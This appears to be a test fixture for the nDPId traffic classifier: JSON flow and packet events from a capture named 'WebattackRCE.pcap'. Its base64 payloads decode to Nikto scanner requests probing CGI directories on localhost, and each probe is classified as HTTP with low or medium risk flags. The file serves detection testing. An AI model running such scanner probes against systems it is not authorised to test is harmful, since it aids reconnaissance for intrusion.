-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276705,"pkt":"AAAAAAAAAAAAAAAACABFAADARJ1AAEAG95h\/AAABfwAAAcHGH5BoLnyEpCdA\/4AYAED+tAAAAQEICp1m+wmdZvsJR0VUIC9jZ2kvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276707,"pkt":"AAAAAAAAAAAAAAAACABFAADCUelAAEAG6kp\/AAABfwAAAcHIH5DIZGoAvjYJ64AYAED+tgAAAQEICp1m+wudZvsLR0VUIC9tcGNnaS8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276708,"pkt":"AAAAAAAAAAAAAAAACABFAADE7opAAEAGTad\/AAABfwAAAcHKH5CIytaS2kjlzYAYAED+uAAAAQEICp1m+wydZvsMR0VUIC9jZ2ktYmluLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276710,"pkt":"AAAAAAAAAAAAAAAACABFAADEp+BAAEAGlFF\/AAABfwAAAcHMH5C4I5\/IUy7GWoAYAED+uAAAAQEICp1m+w6dZvsNR0VUIC9vd3MtYmluLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276711,"pkt":"AAAAAAAAAAAAAAAACABFAADEXJRAAEAG351\/AAABfwAAAcHOH5AWt2SMpHJk2oAYAED+uAAAAQEICp1m+w+dZvsPR0VUIC9jZ2ktc3lzLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276713,"pkt":"AAAAAAAAAAAAAAAACABFAADG5r1AAEAGVXJ\/AAABfwAAAcHQH5DCed6iQK2\/KYAYAED+ugAAAQEICp1m+xCdZvsQR0VUIC9jZ2ktbG9jYWwvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276714,"pkt":"AAAAAAAAAAAAAAAACABFAADCR6dAAEAG9Ix\/AAABfwAAAcHSH5C\/OX\/AhojitYAYAED+tgAAAQEICp1m+xKdZvsSR0VUIC9odGJpbi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276717,"pkt":"AAAAAAAAAAAAAAAACABFAADD3hBAAEAGXiJ\/AAABfwAAAcHUH5AtGuYWzQuuvoAYAED+twAAAQEICp1m+xSdZvsUR0VUIC9jZ2liaW4vIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276718,"pkt":"AAAAAAAAAAAAAAAACABFAADB4dFAAEAGWmN\/AAABfwAAAcHWH5B7V9nVmVXzCoAYAED+tQAAAQEICp1m+xadZvsWR0VUIC9jZ2lzLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276719,"pkt":"AAAAAAAAAAAAAAAACABFAADEZD1AAEAG1\/R\/AAABfwAAAcHYH5Ba2lwhPKb01YAYAED+uAAAAQEICp1m+xedZvsXR0VUIC9zY3JpcHRzLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276721,"pkt":"AAAAAAAAAAAAAAAACABFAADEcYRAAEAGyq1\/AAABfwAAAcHaH5DTlEmfv44DhoAYAED+uAAAAQEICp1m+xmdZvsZR0VUIC9jZ2ktd2luLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 